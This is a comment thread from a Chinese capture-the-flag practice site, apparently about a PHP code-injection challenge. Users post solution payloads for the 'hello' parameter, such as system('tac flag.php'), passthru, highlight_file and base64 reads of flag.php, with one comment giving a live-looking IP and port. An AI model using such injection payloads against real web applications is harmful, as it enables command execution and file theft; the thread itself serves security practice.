评分(10)
解题动态
cccjfddfgyd 攻破了该题 6小时前
hsk_zy 攻破了该题 7小时前
yogalin 攻破了该题 8小时前
main123 攻破了该题 8小时前
k12g 攻破了该题 8小时前
li3427379304 攻破了该题 11小时前
呢称被我吃掉了 攻破了该题 14小时前
haduck 攻破了该题 16小时前
xiao ovo 攻破了该题 17小时前
笛安丶 攻破了该题 17小时前
进击的鱼尾 攻破了该题 1天前
1112223 攻破了该题 1天前
jjjdas 攻破了该题 1天前
nanaqilin 攻破了该题 1天前
小白RM 攻破了该题 1天前
xc8888888 攻破了该题 1天前
tschick 攻破了该题 1天前
哈哈1 攻破了该题 1天前
一骑绝尘 攻破了该题 1天前
评论
pks0 5月前
举报
?hello=1);highlight_file(%27flag.php%27);//
一个姓⎝李⎠的师傅~ 7月前
举报
知其然,不知其所以然,以后还是不会类似的题目:(下面是我写了 1 天的思路,保证你看完以后一切都明白了!!!) https://www.yuque.com/u21437924/ap9vtm/gqkc3dcfmfpe5p85?singleDoc#fYY9d
pipipikaqiu 4月前
举报
写的好详细,太好了啊
一个姓⎝李⎠的师傅~ 4月前
举报
@想好思路再支付 有帮助就好,感谢老铁的认可!!!
想好思路再支付 4月前
举报
思路讲的真好啊李师傅
ubudj 7月前
举报
?hello=file(%27flag.php%27) ,%27 是单引号(')的 URL 编码形式。 确保 file() 函数能正确识别要读取的文件名
默认 7月前
举报
hello=a=system('ls'),发现能输出东西,剩下的就是ls换成你想要做的命令,然后试试cat flag.php 这个cat是输出东西的,然后换成其他的东西都行,cat不行就tac,能出来答案 ps:在根目录下有一个叫做flag的文件,这里用 cat /flag 是没有问题的
wywsssf 7月前
举报
找到参数hello,首先?hello=system('ls'),看到flag.php,再执行?hello=system('cat flag.php'),发现无内容,尝试把cat换成tac则成功
dlgz 8月前
举报
?hello=file(%27flag.php%27) ?hello=system(%27tac%20f*%27)
wuzhi唔知 8月前
举报
http://IP:PORT/?hello="<input%20value=%27$flag%27>" ---TEST end
Bruce20231767 8月前
举报
http://117.72.52.127:18257/?hello=system(%22tac%20flag.php%22)
lmds 8月前
举报
?hello=passthru('tac flag.php')
TUGUNBB 8月前
举报
?hello=system("base64 flag.php"),拿到的东西base64解码就行了